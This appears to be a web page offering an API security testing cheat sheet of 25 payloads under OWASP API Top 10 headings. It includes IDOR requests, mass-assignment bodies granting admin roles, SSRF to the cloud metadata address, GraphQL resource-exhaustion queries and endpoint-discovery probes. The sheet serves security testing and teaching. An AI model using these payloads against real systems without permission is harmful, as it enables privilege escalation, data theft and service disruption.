API Security Cheat Sheet

API security testing techniques covering BOLA/IDOR, mass assignment, broken function level auth, excessive data exposure, SSRF, and shadow APIs. (25 payloads)

BOLA/IDOR (API1)

(5)

GET /api/v1/users/2 HTTP/1.1

Access another user's data (logged in as user 1)Broken Object Level Authorization

GET /api/v1/users/1 HTTP/1.1

Access admin account — ID=1 is often admin

POST /api/v1/messages
{"to": "other_user_id"}

Send message as another user

PUT /api/v1/accounts/other_id/settings

Modify another account's settings

PATCH /api/v1/orders/ORDER_ID

Modify another user's order (as unauthorized user)

BOPLA/Mass Assignment (API3)

(3)

POST /api/register
{"username":"x","password":"y","isAdmin":true}

Mass assignment: add admin field to registration

PATCH /api/users/me
{"role":"admin"}

Privilege escalation via mass assignment

PUT /api/profile
{"email":"[email protected]","balance":999999}

Modify protected fields via mass assignment

Broken Function Level Auth (API5)

(3)

DELETE /api/v1/admin/users/123

Access admin function as regular userBFLA

GET /api/v1/admin/reports

Admin endpoint accessed with regular session

PUT /api/v1/users/123/role

Role modification endpoint accessible to regular users

Excessive Data Exposure (API6)

(2)

GET /api/users/me

Compare response to what the UI shows — look for extra fields: password_hash, internal_id, credit_card_last4

Inspect all API responses for fields not rendered in the UI — filter logic may hide data client-side only

Hidden fields in API responses — server sends more than it should

Rate Limiting / Resource Consumption (API4)

(3)

[{"query":"..."},{"query":"..."}]

GraphQL batch request attack — multiply requests in one HTTP callSend array of 1000+ queries

query { user { posts { comments { likes { user { posts { ... } } } } } } }

Nested resource bomb — deeply recursive GraphQL query

Upload endpoint with no Content-Length check

Large file upload without size limits causes resource exhaustion

SSRF via API (API7)

(2)

POST /api/fetch
{"url":"http://169.254.169.254/latest/meta-data/"}

Cloud SSRF via API fetch endpoint

POST /api/webhook
{"callback":"http://internal-api/admin"}

Webhook SSRF to internal services

Security Misconfiguration (API8)

(4)

/api/swagger.json

Exposed Swagger/OpenAPI docs — full endpoint listing

/api/openapi.json

OpenAPI specification exposed publicly

/api/graphql

GraphQL with introspection enabled — full schema disclosure

OPTIONS /api/users

Check exposed HTTP methods and CORS headers

Shadow APIs (API9)

(3)

/api/v2/

Try versioned shadow endpoints: /api/v2/, /api/v3/, /api-old/, /api-beta/, /api/internal/

Search JS bundle files for fetch() and axios() calls to find undocumented endpoint paths

JS source mining for hidden API endpoints

Intercept mobile app traffic — mobile APIs often differ from web app endpoints

Mobile app endpoints may expose additional or unprotected API surface

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

GraphQL Injection

Related Cheat Sheets

NoSQL Injection Cheat Sheet IDOR Cheat Sheet OAuth & OIDC Security Cheat Sheet

$loading...